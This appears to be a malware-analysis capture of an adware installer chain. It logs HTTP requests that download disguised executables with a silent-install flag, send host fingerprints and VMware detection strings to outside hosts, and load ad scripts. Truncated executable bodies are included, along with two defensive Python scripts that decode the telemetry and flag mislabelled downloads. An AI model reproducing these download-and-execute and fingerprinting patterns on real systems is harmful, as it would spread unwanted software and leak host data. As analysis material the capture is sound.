.R.........X.<....^.PH..NO.)...^KM-.......:.8...Q..S7.`. ...V...D.@
.'.<..x!..1.PU.ktr<R.@.W.......t....l..'d..n.'|v*...R..=.uau0..u
C...S.......G....F............f...h.XN.h..-(..../....l.f..fI..`G.|....
.\...bf..Q*...p....Y..R......w........\aj.TR..IUA.d.6...@.DqNi..8.#.l!
)l(,V....6m.<...E..../.y....P.......y.........O.f....-.....Y....B.(
.s..r....z<jf....m...[Hc...%5.....$..x.Z...u2.....h.........94{....
.9...\.wE.?....!E.\l..S...).....A...2FV.y..Z..d.HEPsy....!.*X.......?s
|.qM..y..U.s.......m....Zi.T......C....m.nB.......4.....Q.........) ..
.Ph..'.~|..nZ'.Fpk..:....3...)_|.~....H..gnM.J?k....$y......-.....<<< skipped >>>
POST hXXp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.ilentialnessme.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 162
cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:22 GMT
Connection: close
Content-Length: 37480
....~h........7.zEh....< ..v.H....x.3..zPrd9F..........8. ..oH.X...
.{<...v"..VC...j.R.'L.3. ....;6.|.d,.z..$........1..1f%..Be ..M..7.
..K.)... ..B.(...:.....Z.........P2...*.z)NZei......H[ 3.......3...m.I
._AF.......6...@.$..[.v.....>....Y.o..<....i.|...T...!.#..M.....
.........SD.(....i..<R....|6.H.v[.B2....5j...$.pyj..^...9...D..~..
....6...8..._.#{..;z...6..u..d.K.....s..,zW...c...[.d..4.#.O.S..zoD...
4...-[A..s...A...Y..l....*zd...y...V.3;~-...%....t.ft.......e.MK..xMs.
..W?K.9.BA.Hs..q..d7..(.;o...O....F.... ..m.(......S..lZ..R...... ..[.
.4.t...u..u...<;*#.)_S.d.V,s. jX.).@.oM....k..}./^-l.e..uE.......l.
.,.W#......vK.i..yGY..H`..z.M5}..2(...-F&o./.$.4T.I?.!...7Ez.G.>...
..&....~.C3...(a#..`..AHs....H.v)So....~.).../).:#.<.{.).V....f....
V.F.X..?.......(....f.E..E..r...X......Y......5. ..3.-.H.....<.Z..Y
o.y..v...[.......t.......Dl.3.......LJ3Wj...:...).]k.W"6..W.5AB....t..
..bd`|....e^.K......N..\.-m...0T...?.....I.%...x4..{...........^[.X..^
...@o...CN....0.@...)0.#..4)...GA..KX1....u?.....)Vg..pz..G...O.,K"c".
0.(@ ..@..2......U......m.to...r.1.4. a..G.v.._0.a......c~..........R!
v.CVH..-&..q.........n ..z..C.@d...... ;w.D..S.8.F. .VT..}1.,.>.X..
.U...U.Z..f...W(}-$..K%..&...K.8...IA..,y2....1I#a\e.F...uX...[{k...9\
...D.Q^K.6.$fR..._.6C.uR'..}.;...$-.s....,.Pu\N..'.*..s.{r..e..H..1@.T
...J.X)z..d..PR...O...f.. k...t.S....1. .]../%/_.D6...x... .J..c..>
...X.N....a..."P...=B...y.'......<....Y$l.kj.......<>.[..oq..
..(Z..4Z.Fw.U.....>..A.ps.De.=..9MF...[;$G..H.....~...j.]..b..1<<< skipped >>>
GET /stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=setup&name=Installation HTTP/1.0
Host: wet.sodcattilyrem.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 60652
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="5827498a25abb_ua.exe"
X-Powered-By: ASP.NET
Date: Sat, 12 Nov 2016 16:55:38 GMT
Age: 44593
X-Cache: Hit from cloudfront
Via: 1.1 cd57e6888980d1e458b233b5ef20ee46.cloudfront.net (CloudFront)
X-Amz-Cf-Id: i8UIml3LnG1MKA8CDNO6PQ3HlSVYkDtsv9mUevVxV14GyEXXXEltOw==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................n.......B...8............@..............
............`............@.................................4........@.
.........................d............................................
........................................text....m.......n.............
..... ..`.rdata..b*.......,...r..............@..@.data....~...........
...............@....ndata.......0...........................rsrc......
..@......................@..@.reloc..2....P......................@..B.
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u...
..@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.....
..P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ<<< skipped >>>
GET /taveara?q=setup HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: gurusetman.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Date: Sun, 13 Nov 2016 05:19:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d640d2d826032587efe6ad339dd60f7a71479014358; expires=Mon, 13-Nov-17 05:19:18 GMT; path=/; domain=.gurusetman.info; HttpOnly
X-Powered-By: PHP/5.4.37
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Last-Modified: Sun, 13 Nov 2016 05:19:19 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: hXXp://greates.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: *
Access-Control-Request-Headers: *
Server: cloudflare-nginx
CF-RAY: 300fc49e36a12914-OTP
GET hXXp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.ilentialnessme.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:20 GMT
Connection: close
Content-Length: 593
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a></body>
GET /report.php?typ=sys&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&transId=135176390&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.44531263149565414 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.ilentialnessme.bid
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:30 GMT
Content-Length: 0
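The two phone-home requests above (the index.php POST from Setup__2140_il2.exe to VVV.selfdislikedfarfet.site and the report.php?typ=sys GET from the InstallCapital stub to ee.ilentialnessme.bid) carry the host profile as plain form fields plus three base64 fields, each with a trailing NUL. The Python below is an added example, not part of the Lavasoft report or of the sampled binary: it parses both requests exactly as copied from this capture, decodes the base64 fields, cross-checks the MAC address the two components report independently, and flags the SMBIOS strings that give the VMware sandbox away. It also decodes the ho_mob cookie set by win.ketydesmidiana.bid and the truncated g_eula blob from the DownloadManagerModern page. The hypervisor markers beyond "VMware" and all function names are my own choices, not anything the sample uses.

```python
import base64
import json
from urllib.parse import parse_qsl, urlsplit

# Constructed sample inputs: copied from the capture above (the index.php POST
# body, the report.php?typ=sys query string, the ho_mob cookie and the
# truncated g_eula blob). Nothing below touches the network.
INDEX_POST_BODY = (
    "Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv="
    "&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B"
    "&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__2140_il2.exe"
    "&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64"
    "&exe=Setup__2140_il2&ffver=49.0.1.6109&lang_DfltUser=0409"
    "&mac=MDA1MDU2MzNCNTUxMDAwMAA="
    "&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA=="
    "&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1479014369&ver=1.1.5.26"
)
SYS_REPORT_URL = (
    "http://ee.ilentialnessme.bid/report.php?typ=sys&affId=1006&instId=11"
    "&ho_transId=1022cfb36461ebc8195bc69760cdf1&transId=135176390"
    "&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c"
    "&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc."
    "&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51"
    "&randid=0.44531263149565414"
)
HO_MOB_COOKIE = ("eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwi"
                 "LCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=")
G_EULA_TRUNCATED = (
    "VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMgc"
    "nVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJ"
    "BY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoa"
    "XMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3R"
)

# The three base64 fields each carry a trailing NUL: the client evidently
# encodes the raw C string including its terminator.
B64_FIELDS = ("mac", "machg", "name")
# Hypervisor markers to look for in the SMBIOS strings. Only "VMware" occurs
# in this capture; the others are my additions (assumption).
HYPERVISOR_TAGS = ("vmware", "virtualbox", "qemu", "hyper-v", "parallels")


def b64_text(value):
    """Decode one base64 field to text and drop the trailing NUL."""
    return base64.b64decode(value, validate=True).decode("ascii").rstrip("\x00")


def b64_text_truncated(value):
    """Decode a base64 string that was cut off mid-stream (like g_eula above):
    drop the dangling partial quartet, then decode what is complete."""
    usable = value[: len(value) - len(value) % 4]
    return base64.b64decode(usable, validate=True).decode("utf-8", "replace")


def parse_index_post(body):
    """Parse the x-www-form-urlencoded telemetry POST, decoding the base64 fields."""
    fields = dict(parse_qsl(body, keep_blank_values=True))
    for key in B64_FIELDS:
        if key in fields:
            fields[key] = b64_text(fields[key])
    return fields


def format_mac(hexstr):
    """'00505633B5510000' -> '00:50:56:33:B5:51' (first six octets only)."""
    return ":".join(hexstr[i:i + 2] for i in range(0, 12, 2)).upper()


def parse_sys_report(url):
    """Pull the hardware-check fields out of the report.php?typ=sys query string."""
    q = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    return {
        "bios_serial": q.get("chk_s_b", ""),
        "bios_version": q.get("chk_s_v", ""),
        "manufacturer": q.get("chk_c_ma", ""),
        "model": q.get("chk_c_mo", ""),
        "mac": q.get("chk_mac", "").upper(),
        "transaction": q.get("ho_transId", ""),
    }


def hypervisor_reported(sys_report):
    """True when the SMBIOS strings the installer phoned home name a hypervisor."""
    blob = " ".join(sys_report[k] for k in ("bios_serial", "manufacturer", "model")).lower()
    return any(tag in blob for tag in HYPERVISOR_TAGS)


def decode_ho_mob(cookie_value):
    """The ho_mob cookie is base64 over a small JSON object."""
    return json.loads(base64.b64decode(cookie_value, validate=True))


def build_fingerprint(post_body, sys_url, ho_mob):
    """Combine the two phone-home requests into one host profile."""
    post = parse_index_post(post_body)
    sysr = parse_sys_report(sys_url)
    mac_post = format_mac(post["mac"])
    return {
        "hostname": post["name"],
        "machine_guid": post["machg"],
        "mac": mac_post,
        "mac_consistent": mac_post == sysr["mac"],
        "os": post["OSversion"],
        "is_admin": post["admin"] == "Y",
        "dropper_cmdline": post["cmdl"],
        "hypervisor_reported": hypervisor_reported(sysr),
        "vendor_cookie": decode_ho_mob(ho_mob),
    }


if __name__ == "__main__":
    print(json.dumps(build_fingerprint(INDEX_POST_BODY, SYS_REPORT_URL, HO_MOB_COOKIE), indent=2))
    print(b64_text_truncated(G_EULA_TRUNCATED))
```

Run stand-alone it prints the decoded profile: the sandbox hostname, the machine GUID, the MAC (which matches chk_mac in the sys report, so the two components fingerprint the same adapter), and the VMware strings that the affiliate backend receives before deciding which offers to push. The decoded EULA text is what the DownloadManagerModern page shows the user only after base64-decoding it client-side.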
GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0
Host: VVV.dosecuretrips.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Setup__2140_il2.exe"
Content-Type: application/x-msdownload
Date: Sun, 13 Nov 2016 05:19:26 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2016 05:19:26 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: Setup__2140_il2.exe
Content-Length: 716800
Connection: Close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........<...R..
.R...R.u.....R..4....R.......R..4..Q.R.......R..4....R...R...R.......R
.......R...S...R..4....R..4....R..4....R.Rich..R......................
...PE..L...=0.X.................b........................@............
..............P............@..........................................
...8E......................\Z.. ...................................@..
.............\............................text...[`.......b...........
....... ..`.rdata..d............f..............@..@.data....[...@...4.
.................@....rsrc...8E.......F...L..............@..@.reloc..@
].......^..................@..B.......................................
......................................................................
......................................................................
......................................................................
................................................ ..........3.9.....V..
......D$.....^...j ..NF......3.9.tRj.h|.G..M..E......]..].......]..}..
.E.s..E.SSS.6Ph..G......YY...6....F.Sj..M............3..H..H....3....H
..|.H..x.H..t.H....H..t.H..3.9..XH.t..=.XH....XH.s...XH..j..6TF.......
}.j.....G.X3.3..G.._.f.O..]..G83.._4f.G$.u..w@.E........Gp....._l3.f.G
\........G............................................................
................................_x._|................V........D$..t.V.
.=..Y..^...j...TF......j....H.X3.3..}.....H...G....H.....H.f....H.<<< skipped >>>
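The three executables fetched in this capture arrive under three different labels: application/exe with a meaningless charset=windows-1251 (setup.exe from oblo.raidedsentry.ru, whose body opens with the Delphi/Borland MZP stub), application/force-download (5827498a25abb_ua.exe from wet.sodcattilyrem.bid) and application/x-msdownload (Setup__2140_il2.exe from VVV.dosecuretrips.com). A proxy or sensor that keys on Content-Type catches at most one of them. The Python below is an added example, not code from the report or from the analysed sample: it parses a response head copied from the capture, pulls the Content-Disposition filename, and decides from the first bytes (MZ magic plus the e_lfanew pointer to PE\0\0) whether an executable was delivered, whatever the server claimed. The bodies are synthetic minimal PE prefixes built by make_pe_prefix(), since the real bytes are not reproduced on the page; the helper names and the EXE_MIME set are mine.

```python
import re
import struct

# Constructed sample inputs: the three response heads are copied from the
# capture above; the bodies are synthetic stand-ins built by make_pe_prefix().
HEAD_SETUP_EXE = """HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: application/exe; charset=windows-1251
Content-Length: 4758720
Content-Disposition: attachment; filename="setup.exe"
Content-Transfer-Encoding: binary
"""
HEAD_STUB_EXE = """HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 60652
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="5827498a25abb_ua.exe"
X-Powered-By: ASP.NET
"""
HEAD_PNG = """HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 3392
Server: AmazonS3
"""
PNG_PREFIX = b"\x89PNG\r\n\x1a\n" + b"\x00" * 0x80  # constructed, not the real image

# MIME types that honestly declare a Windows executable (my list, assumption).
EXE_MIME = {"application/x-msdownload", "application/exe",
            "application/x-msdos-program", "application/vnd.microsoft.portable-executable"}


def make_pe_prefix(stub=b"MZ", e_lfanew=0x80):
    """Build a minimal DOS header + PE signature (synthetic, not a real file).
    b'MZP' is the stub Delphi/Borland linkers emit, as in the setup.exe body."""
    dos = stub.ljust(0x3C, b"\x00") + struct.pack("<I", e_lfanew)
    return dos.ljust(e_lfanew, b"\x00") + b"PE\x00\x00" + b"\x00" * 20


def parse_response_head(raw):
    """Split a response head into (status line, {lowercased name: value});
    repeated headers such as X-Powered-By are joined with ', '."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        headers[name] = headers[name] + ", " + value if name in headers else value
    return lines[0], headers


def disposition_filename(headers):
    """Filename from Content-Disposition, or '' if there is none."""
    m = re.search(r'filename\s*=\s*"?([^";]+)"?', headers.get("content-disposition", ""), re.I)
    return m.group(1).strip() if m else ""


def is_pe_image(body):
    """True when the body starts with 'MZ' and e_lfanew points at 'PE\\0\\0'.
    Relabelling Content-Type or the filename does not change this."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)
    return body[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify_download(raw_head, body_prefix):
    """Decide whether a response delivered a Windows executable, recording
    what the headers claimed next to what the bytes say."""
    _, h = parse_response_head(raw_head)
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    fname = disposition_filename(h)
    pe = is_pe_image(body_prefix)
    return {
        "filename": fname,
        "content_type": ctype,
        "declares_exe": ctype in EXE_MIME,
        "named_exe": fname.lower().endswith((".exe", ".scr", ".dll")),
        "is_pe": pe,
        "mislabelled": pe and ctype not in EXE_MIME,
        "alert": pe,  # the magic, not the label, decides
    }


if __name__ == "__main__":
    for head, body in ((HEAD_SETUP_EXE, make_pe_prefix(b"MZP")),
                       (HEAD_STUB_EXE, make_pe_prefix()),
                       (HEAD_PNG, PNG_PREFIX)):
        print(classify_download(head, body))
```

The mislabelled flag is the one to route to an analyst: a PE arriving as application/force-download, or under a text or image type, is the pattern of a download stub that does not want to be recognised at the perimeter. Note that the check needs only the first e_lfanew + 4 bytes of the body, so it works on a truncated capture like the ones in this report.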
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 2024
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:42 GMT
Last-Modified: Fri, 07 Oct 2016 08:03:05 GMT
ETag: "d9eb4e61c136f58576485da85fc9897d"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64430
X-Cache: Hit from cloudfront
Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RNnNcZpMOUg5CGj4HVkrzEXlQWhIkZKaZJi-h-cKXyELoonJcVIG7Q==
<html><head>
 <meta charset="utf-8">
 <meta name="description" content="">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <title>Thank You Page</title>
 <link rel="stylesheet" href="assets/css/style.css">
 <body>
 <header class="header">
 <div class="header-top green"></div>
 <div class="header-bottom grey">
 <h1 class="typ">.............. .... ....................</h1>
 </div>
 </header>
 <div id="widget">
 <div class="adnl_zone">
 <script type="text/javascript">
 /*<![CDATA[*/
 supp_key = "575f4f5e34f49079faeab77365968081";
 supp_time = new Date().getTime();
 supp_channel = "";
 supp_code_format = "ads-sync.js";
 supp_click = "";
 supp_custom_params = {};
 /*]]>*/
 </script>
 <script type='text/javascript' src='//VVV.1-1ads.com/js/show_ads_supp.js?pubId=907'></script>
 </div>
 </div>
 <footer class="footer green">
 <div class="container">
 <h3 class="green">.......... .................., .......... ................ .. ....................:</h3>
 <ul class="steps<<< skipped >>>
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css HTTP/1.1
Accept: text/css
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 1967
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT
ETag: "92657668b4257695bd2699a787aee60b"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64444
X-Cache: Hit from cloudfront
Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: TkxLSAtQrofDzYiZGGzEPDHmdWKYGV5NKLAXdAGX1Nu99LN1UPCSVg==

body{ margin: 0; padding: 0; font-family: Helvetica, Arial, sans-serif; }
h1{ margin: 0; font-size: 28px; font-weight: normal; text-align: center; color: #333; }
.container{ margin: 0 auto; width: 980px; padding-left: 20px; padding-right: 20px; }
.header h1.typ{ line-height: 80px; padding-top: 0; }
.header h1{ padding-top: 13px; }
.header h1 span{ display: block; font-size: 14px; }
.header-top, .header-bottom{ position: relative; height: 80px; width: 100%; }
.header-top.green{ background: #22B573; }
.header-top.blue{ background: #0461C9; }
.header-bottom.grey{ background: #CCCCCC; }
.header-bottom.light-blue{ background: #B6D2F2; border-bottom:1px solid #02294C; }
#widget{ margin: 0 auto; margin-top: 50px; margin-bottom: 150px; }
.footer{ position: relative; width: 100%; height: 216px; background: #e5e5e5; border-top: 1px solid #fff; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; }
.footer:before{ position: absolute; left: 0; right: 0; top: -2px; height: 1px; width: 100%; content: ''; }
.footer.green:before{ background: #0F4C2E; }
.footer.blue:before{ background: #02294C; }
.footer h3{ margin-top: 38px; margin-bottom: 28px; font-size: 18px; text-align: center; text-shadow: -1px 1px 0 #fff; }
.footer h3.green{ color: #22B573; }
.footer h3.blue{ color: #0461C9; }
ul.steps{ margin: 0; padding: 0; list-style-type: none; }
ul.st<<< skipped >>>
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 403 Forbidden
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 13 Nov 2016 05:18:13 GMT
Server: AmazonS3
Age: 82
X-Cache: Error from cloudfront
Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fXaJKV8QCC1-uGe2jqVL60EcnCsHeMmojKoDEP-Ks0uEmJniEtuHug==

f3
<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5BB8DEA19076C304</RequestId><HostId>LWCozxd6XPbPKEl3NYSn/+yXE9CAeg0hAv0mqYqDTyL7Fc7lhCJdt9GChZUouqV4QcMLE2bdimk=</HostId></Error>
0
GET /js/show_ads_supp.js?pubId=907 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.1-1ads.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=3600
Transfer-Encoding: chunked
Date: Sun, 13 Nov 2016 05:19:34 GMT
Connection: close

2000
var supp_ads_host_overridden="//VVV.1-1ads.com";
var supp_key,supp_channel,supp_code_format,supp_ads_host,supp_ads_host_overridden,supp_click,supp_custom_params,supp_width,supp_height,supp_target_id,supp_template_target_id,SuppConfig,SuppAdsConfig=SuppConfig,CustomWLAdServer=CustomWLAdServer||{requests:[]};
CustomWLAdServer.sendbackPlacementKeyFromRequests=function(a){var c=CustomWLAdServer;if(c.requests&&0<c.requests.length&&c.passbackCallbacks&&c.passbackCallbacks["v2-"+a])for(var b in c.passbackCallbacks["v2-"+a]){var d=c.findRepReqByKey(b);(d=d&&(d.supp_target_id||d.elemId))&&document.getElementById(d)&&c.doPostMessageFuncIntoIFrames(document.getElementById(d),"customwl.plkey.for.banner"+a+"\x3d"+b)}};
try{var messageEventListener=function(a){if(a&&a.data&&"string"===typeof a.data){if(0==a.data.indexOf("rrImpl")){try{eval("CustomWLAdServer."+a.data)}catch(c){console.warn(c)}return!0}if(0==a.data.indexOf("sendRequestInfo:")){var b=a.data.substring(16),b=CustomWLAdServer.findRepReqByKey(b);if(null!=b)return b.elemId&&document.getElementById(b.elemId)&&document.getElementById(b.elemId).contentWindow&&document.getElementById(b.elemId).contentWindow.postMessage("requestInfoMessage:"+JSON.stringify(b),"*"),!0}if(0===a.data.indexOf("customwl.plkey.request.for.banner\x3d")){var b=a.data.split("\x3d")[1],d=CustomWLAdServer,e=d.passbackCallbacks&&d.passbackCallbacks["v2-"+b];if(e)if(1==Object.keys(e).length)e[Object.keys(e)[0]]();else d.sendbackPlacementKeyFromRequests(b)}if(0==a.data.indexOf("requestInfoMe<<< skipped >>>
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon3-green.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 1519
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:51 GMT
ETag: "659184a48243f6ae257bc88d601ac7e1"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64443
X-Cache: Hit from cloudfront
Via: 1.1 0176a7920fd558900dd5f893f79acb9e.cloudfront.net (CloudFront)
